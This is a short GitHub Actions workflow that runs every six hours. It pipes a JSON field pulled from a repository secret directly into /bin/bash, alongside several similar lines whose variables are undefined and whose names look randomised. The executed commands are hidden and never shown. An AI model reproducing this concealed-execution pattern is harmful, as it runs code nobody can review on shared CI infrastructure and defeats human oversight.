name: chuanssu
on:
  workflow_dispatch:
  schedule:
    - cron: '8 0/6 * * *'

jobs:  # 993
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chuanssu
        env:
          m7813: ${{ secrets.m7813 }}
        run: |
          echo $m7813 | jq -r .e1 | /bin/bash
          echo $bziy5831 | jq -r .lmkbf5 | /bin/bash
          echo $kw3769 | jq -r .sp13 | /bin/bash
          echo $rzdzk0 | jq -r .buzhi2856 | /bin/bash
          echo $gjmjp92 | jq -r .ihz9407 | /bin/bash
          echo $bnwr65180 | jq -r .hbrz618 | /bin/bash
          echo $zj8475 | jq -r .sjgrc64317 | /bin/bash
          echo $vq6 | jq -r .mol6023 | /bin/bash

